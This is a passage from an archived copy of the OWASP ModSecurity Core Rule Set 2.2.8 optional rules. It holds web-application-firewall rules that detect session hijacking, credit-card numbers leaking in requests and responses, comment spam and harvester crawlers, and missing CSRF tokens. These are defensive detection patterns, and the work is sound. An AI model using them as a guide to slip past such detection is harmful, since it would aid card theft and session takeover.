re-enable the audit engine if the request # was not blocked by one of the normal rules. # Update IP address/network block as appropriate for your ASV traffic #SecRule REMOTE_ADDR "@streq 192.168.1.101" "phase:3,id:'981035',t:none,nolog,pass,ctl:auditEngine=On" ������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_13_xml_enabler.conf���������0000664�0000000�0000000�00000001213�12164572564�0032520�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # The rules in this file will trigger the XML parser upon an XML request # Initiate XML Processor in case of xml content-type SecRule REQUEST_HEADERS:Content-Type "text/xml" \ "phase:1,id:'981053',t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_16_authentication_tracking.conf�����������������������������������������������������0000664�0000000�0000000�00000004104�12164572564�0035057�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules����������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Create an audit log of a successful Authentication. # # We also set the username in the Session and User collections. This allows # for showing the UserID associated with the SESSIONID in any alerts generated. # # Must review the ModSecurity audit log data to review what a successful auth attempt # looks like and then customize this template ruleset for it. # #SecRule REQUEST_FILENAME "@streq /path/to/login.jsp" "chain,phase:3,t:none,pass,nolog,auditlog,msg:'Successful Authentication Attempt.',logdata:'Username - %{args.userid}'" # SecRule REQUEST_METHOD "@streq POST" "chain,t:none" # SecRule ARGS:event "@streq LOGON" "chain,t:none" # SecRule RESPONSE_STATUS "@streq 302" "chain,t:none" # SecRule RESPONSE_HEADERS:Location "@streq http://www.example.com/path/to/login.jsp?event=WELCOME" "chain,t:none" # SecRule ARGS:userid ".*" "t:none,setvar:session.username=%{args.userid},setuid:%{args.userid},setvar:session.successful_auth=1" # # Create an alert when a user fails authenticating. # # Must review the ModSecurity audit log data to review what a failed auth attempt # looks like and then customize this template ruleset for it. # #SecRule REQUEST_FILENAME "@streq /path/to/login.jsp" "chain,phase:3,t:none,pass,log,severity:'2',msg:'Failed Authentication Attempt.',logdata:'Username - %{args.userid}'" # SecRule REQUEST_METHOD "@streq POST" "chain,t:none" # SecRule ARGS:event "@streq LOGON" "chain,t:none" # SecRule RESPONSE_STATUS "@streq 302" "chain,t:none" # SecRule RESPONSE_HEADERS:Location "@streq http://www.example.com/path/to/login.jsp?event=ERROR&ErrorDesc=Invalid User ID/Password Please try again." "t:none" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_16_session_hijacking.conf���0000664�0000000�0000000�00000007355�12164572564�0033742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This rule file will identify outbound Set-Cookie/Set-Cookie2 response headers and # then initiate the proper ModSecurity session persistent collection (setsid). # The rules in this file are required if you plan to run other checks such as # Session Hijacking, Missing HTTPOnly flag, etc... # # # This rule set will identify subsequent SessionIDs being submitted by clients in # Request Headers. First we check that the SessionID submitted is a valid one # SecMarker BEGIN_SESSION_STARTUP SecRule REQUEST_COOKIES:'/(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid)/' ".*" "chain,phase:1,id:'981054',t:none,block,log,msg:'Invalid SessionID Submitted.',setsid:%{matched_var},setvar:tx.sessionid=%{matched_var},skipAfter:END_SESSION_STARTUP" SecRule SESSION:IS_NEW "@eq 1" "t:none,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/INVALID_SESSIONID-%{matched_var_name}=%{tx.0}" SecRule &REQUEST_COOKIES:'/(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid)/' "@eq 0" "phase:1,id:'981055',t:none,nolog,pass,skipAfter:END_SESSION_STARTUP" SecAction "phase:1,id:'981056',t:none,nolog,pass,setuid:%{session.username},setvar:session.sessionid=%{tx.sessionid}" SecRule REMOTE_ADDR "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)" "chain,phase:1,id:'981057',capture,t:none,nolog,pass" SecRule TX:1 ".*" "t:sha1,t:hexEncode,setvar:tx.ip_hash=%{matched_var}" SecRule REQUEST_HEADERS:User-Agent ".*" "phase:1,id:'981058',t:none,t:sha1,t:hexEncode,nolog,pass,setvar:tx.ua_hash=%{matched_var}" SecRule TX:IP_HASH "!@streq %{SESSION.IP_HASH}" "phase:1,id:'981059',t:none,block,setvar:tx.sticky_session_anomaly=+1,msg:'Warning - Sticky SessionID Data Changed - IP Address Mismatch.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SESSION_HIJACK-%{matched_var_name}=%{tx.0}" SecRule TX:UA_HASH "!@streq %{SESSION.UA_HASH}" "phase:1,id:'981060',t:none,block,setvar:tx.sticky_session_anomaly=+1,msg:'Warning - Sticky SessionID Data Changed - User-Agent Mismatch.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SESSION_HIJACK-%{matched_var_name}=%{tx.0}" SecRule TX:STICKY_SESSION_ANOMALY "@eq 2" "phase:1,id:'981061',t:none,block,msg:'Possible Session Hijacking - IP Address and User-Agent Mismatch.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SESSION_HIJACK-%{matched_var_name}=%{tx.0}" SecMarker END_SESSION_STARTUP # # This rule will identify the outbound Set-Cookie SessionID data and capture it in a setsid # SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(?i:(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid).*?=([^\s].*?)\;\s?)" "chain,phase:3,id:'981062',t:none,pass,nolog,capture,setsid:%{TX.6},setvar:session.sessionid=%{TX.6},setvar:tx.ip=%{remote_addr},setvar:tx.ua=%{request_headers.user-agent}" SecRule UNIQUE_ID "(.*)" "t:none,t:sha1,t:hexEncode,capture,setvar:session.csrf_token=%{TX.1}" SecRule REMOTE_ADDR "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)" "chain,phase:3,id:'981063',capture,t:none,nolog,pass" SecRule TX:1 ".*" "t:sha1,t:hexEncode,setvar:session.ip_hash=%{matched_var}" SecRule REQUEST_HEADERS:User-Agent ".*" "phase:3,id:'981064',t:none,t:sha1,t:hexEncode,nolog,pass,setvar:session.ua_hash=%{matched_var}" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_16_username_tracking.conf���0000664�0000000�0000000�00000003055�12164572564�0033742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Template rules for login/audit rules. # Uncomment the following lines and specify the path or specific login resource for protection # #<LocationMatch "^/(?:(admin|account\/login\.jsp$))"> # # Identify/Set the UserID name and collection # Must correctly specify the parameter name that holds the username data (example ARGS:username) # #SecRule ARGS:username ".*" "phase:2,id:'981075',t:none,pass,nolog,noauditlog,capture,setvar:session.username=%{TX.0},setuid:%{TX.0}" # # Password Complexity Check # Must correctly specify the parameter name that holds the password data (example ARGS:password) # The regex below requires 8 length, one upper, one lower, and one number. # #SecRule ARGS:password "^(?=[a-zA-Z0-9]*?[A-Z])(?=[a-zA-Z0-9]*?[a-z])(?=[a-zA-Z0-9]*?[0-9])[a-zA-Z0-9]{8,}$" "phase:2,id:'981076',t:none,block,log,msg:'Password does meet complexity requirements.',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}-POLICY-%{matched_var_name}=%{matched_var}" # # Sanitize the user's password data in the audit logs # Set the appropriate password parameter name #SecAction "phase:5,id:'981077',t:none,pass,nolog,sanitiseArg:password" #</LocationMatch> �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_25_cc_known.conf������������0000664�0000000�0000000�00000021706�12164572564�0032045�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # Detect CC# in input, log transaction and sanitize SecRule ARGS "@verifyCC (?:^|[^\d])(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?:[^\d]|$)" \ "phase:2,id:'981078',t:none,pass,nolog,skip:1" SecAction "phase:2,id:'981079',t:none,pass,nolog,skipAfter:END_KNOWN_CC_INBOUND_CHECK" # GSA SmartPay SecRule ARGS "@verifyCC (?:^|[^\d])((?:5568|4(?:486|716))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|8699\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'GSA SmartPay Credit Card Number detected in user input',id:'920019',tag:'PCI/10.2',severity:'5'" # MasterCard SecRule ARGS "@verifyCC (?:^|[^\d])(5[1-5]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'MasterCard Credit Card Number detected in user input',id:'920005',tag:'PCI/10.2',severity:'5'" # Visa SecRule ARGS "@verifyCC (?:^|[^\d])(4\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d(?:\d{3})??)(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'Visa Credit Card Number detected in user input',id:'920007',tag:'PCI/10.2',severity:'5'" # American Express SecRule ARGS "@verifyCC (?:^|[^\d])(3[47]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'American Express Credit Card Number detected in user input',id:'920009',tag:'PCI/10.2',severity:'5'" # Diners Club SecRule ARGS "@verifyCC (?:^|[^\d])((?:30[0-5]|3[68]\d)\d\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'Diners Club Credit Card Number detected in user input',id:'920011',tag:'PCI/10.2',severity:'5'" # enRoute #SecRule ARGS "(?:^|[^\d])(2(?:014|149)\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2}|55\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ # "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'enRoute Credit Card Number detected in user input',id:'920013',tag:'PCI/10.2',severity:'5'" # Discover SecRule ARGS "@verifyCC (?:^|[^\d])(6(?:011|5\d{2})\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'Discover Credit Card Number detected in user input',id:'920015',tag:'PCI/10.2',severity:'5'" # JCB SecRule ARGS "@verifyCC (?:^|[^\d])(3\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|(?:1800|21(?:31|00))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "phase:2,t:none,sanitiseMatched,log,auditlog,pass,msg:'JCB Credit Card Number detected in user input',id:'920017',tag:'PCI/10.2',severity:'5'" SecMarker END_KNOWN_CC_INBOUND_CHECK # Detect CC# in output and block transaction SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})(?:[^\d]|$)" \ "phase:4,id:'981080',t:none,pass,nolog,skip:1" SecAction "phase:4,id:'981081',t:none,pass,nolog,skipAfter:END_KNOWN_CC_OUTBOUND_CHECK" # GSA SmartPay SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)((?:5568|4(?:486|716))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|8699\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'GSA SmartPay Card Number sent from site to user',id:'920020',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # MasterCard SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(5[1-5]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'MasterCard Credit Card Number sent from site to user',id:'920006',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # Visa SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(4\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d(?:\d{3})??)(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'Visa Credit Card Number sent from site to user',id:'920008',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # American Express SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(3[47]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'American Express Credit Card Number sent from site to user',id:'920010',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # Diners Club SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)((?:30[0-5]|3[68]\d)\d\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'Diners Club Credit Card Number sent from site to user',id:'920012',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # enRoute #SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "(?:^|[^\d])(?<!google_ad_client = \"pub-)(2(?:014|149)\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2}|55\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ # "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'enRoute Credit Card Number sent from site to user',id:'920014',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" # SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" # SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # Discover SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(6(?:011|5\d{2})\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'Discover Credit Card Number sent from site to user',id:'920016',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # JCB SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(3\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|(?:1800|21(?:31|00))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'JCB Credit Card Number sent from site to user',id:'920018',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" SecMarker END_KNOWN_CC_OUTBOUND_CHECK ����������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_42_comment_spam.conf��������0000664�0000000�0000000�00000010461�12164572564�0032721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Comment spam is an attack against blogs, guestbooks, wikis and other types of # interactive web sites that accept and display hyperlinks submitted by # visitors. The spammers automatically post specially crafted random comments # which include links that point to the spammer's web site. The links # artificially increas the site's search engine ranking and may make the site # more noticable in search results. # SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" "phase:1,id:'981137',t:none,pass,nolog,skipAfter:END_RBL_LOOKUP" SecRule REMOTE_ADDR "@rbl sbl-xbl.spamhaus.org" "phase:1,id:'981138',t:none,pass,nolog,auditlog,msg:'RBL Match for SPAM Source',tag:'AUTOMATION/MALICIOUS',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var},setvar:ip.spammer=1,expirevar:ip.spammer=86400,setvar:ip.previous_rbl_check=1,expirevar:ip.previous_rbl_check=86400,skipAfter:END_RBL_CHECK" SecAction "phase:1,id:'981139',t:none,nolog,pass,setvar:ip.previous_rbl_check=1,expirevar:ip.previous_rbl_check=86400" SecMarker END_RBL_LOOKUP SecRule IP:SPAMMER "@eq 1" "phase:1,id:'981140',t:none,pass,nolog,auditlog,msg:'Request from Known SPAM Source (Previous RBL Match)',tag:'AUTOMATION/MALICIOUS',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}" SecMarker END_RBL_CHECK SecRule REQUEST_HEADERS:User-Agent "@pmFromFile modsecurity_42_comment_spam.data" \ "chain,phase:2,rev:'2.2.8',t:none,t:lowercase,pass,nolog,auditlog,status:404,msg:'Common SPAM/Email Harvester crawler',id:'958297',tag:'AUTOMATION/MALICIOUS',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}'" SecRule REQUEST_HEADERS:User-Agent "^(?:m(?:o(?:zilla\/4\.0\+?\(|vable type)|i(?:crosoft url|ssigua)|j12bot\/v1\.0\.8|sie)|e(?:mail(?:collector| ?siphon)|collector)|(?:blogsearchbot-marti|super happy fu)n|i(?:nternet explorer|sc systems irc)|ja(?:karta commons|va(?:\/| )1\.)|c(?:ore-project\/|herrypicker)|p(?:sycheclone|ussycat|ycurl)|(?:grub crawl|omniexplor)er|a(?:utoemailspider|dwords)|w(?:innie poh|ordpress)|nut(?:scrape/|chcvs)|8484 boston project|user(?:[- ]agent:)?|l(?:ibwww-perl|wp)|di(?:amond|gger)|trackback\/|httpproxy|<sc)" # Prequalifier. Look for <http> first SecRule ARGS|ARGS_NAMES "\bhttp:" "phase:2,rev:'2.2.8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,skip:1,pass,nolog,id:'999010',severity:'6'" SecAction phase:2,id:'999011',rev:'2.2.8',pass,nolog,skipAfter:END_COMMENT_SPAM # Look for 2 ways of posting a link SecRule ARGS|ARGS_NAMES "\[url\b" "phase:2,rev:'2.2.8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,chain,ctl:auditLogParts=+E,block,msg:'Comment Spam',id:'950923',severity:'2'" SecRule ARGS|ARGS_NAMES "\<a" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{tx.0}'" # Look for too many links in an argument (Prone to FPs) SecRule ARGS|ARGS_NAMES "(http:\/.*?){4}" "phase:2,rev:'2.2.8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Comment Spam',id:'950020',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}'" SecMarker END_COMMENT_SPAM ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_43_csrf_protection.conf�����0000664�0000000�0000000�00000006676�12164572564�0033460�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # You must have also activated the 16 session hijacking conf file as # it initiates the Session Collection and creates the CSRF token # # # CSRF Protections # # Must set this directive to On to inject content in the response. # SecContentInjection On # # It is most likely not appropriate to force CSRF tokens/validation on *all* resources. # You should edit the LocationMatch Regular Expression below and specify what resources # you wish to protect. Some ideas would be for post-authentiacation directories, etc... # # Limitations - this implementation does not currently work with AJAX # <LocationMatch .*> SecRule &ARGS "@ge 1" "chain,phase:2,id:'981143',t:none,block,msg:'CSRF Attack Detected - Missing CSRF Token.'" SecRule &ARGS:CSRF_TOKEN "!@eq 1" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/CSRF-%{matched_var_name}=%{matched_var}" SecRule &ARGS "@ge 1" "chain,phase:2,id:'981144',t:none,block,msg:'CSRF Attack Detected - Invalid Token.'" SecRule ARGS:CSRF_TOKEN "!@streq %{SESSION.CSRF_TOKEN}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/CSRF-%{matched_var_name}=%{matched_var}" # # This rule will use Content Injection to append the CSRF Token # SecRule &SESSION:CSRF_TOKEN "@eq 1" "phase:4,id:'981145',t:none,nolog,pass,append:'<html><script language=\"JavaScript\"> \ \ var tokenName = \'CSRF_TOKEN\'; \ var tokenValue = \'%{session.csrf_token}\'; \ \ function updateTags() { \ \ var all = document.all ? document.all : document.getElementsByTagName(\'*\'); \ var len = all.length; \ \ for(var i=0; i<len; i++) { \ var e = all[i]; \ \ updateTag(e, \'src\'); \ updateTag(e, \'href\'); \ } \ } \ \ function updateForms() { \ \ var forms = document.getElementsByTagName(\'form\'); \ \ for(i=0; i<forms.length; i++) { \ var html = forms[i].innerHTML; \ \ html += \'<input type=hidden name=\' + tokenName + \' value=\' + tokenValue + \' />\'; \ \ forms[i].innerHTML = html; \ } \ \ } \ \ function updateTag(element, attr) { \ \ var location = element.getAttribute(attr); \ \ if(location != null && location != \'\' && isHttpLink(location)) { \ \ var index = location.indexOf(\'?\'); \ \ if(index != -1) { \ location = location + \'&\' + tokenName + \'=\' + tokenValue; \ } else { \ location = location + \'?\' + tokenName + \'=\' + tokenValue; \ } \ \ element.setAttribute(attr, location); \ \ } \ \ } \ \ function isHttpLink(src) { \ var result = 0; \ \ if(src.substring(0, 4) != \'http\' || src.substring(0, 1) == \'/\') { \ result = 1; \ } \ \ return result; \ } \ \ updateTags(); \ updateForms(); \ \ </script></html>'" </LocationMatch> 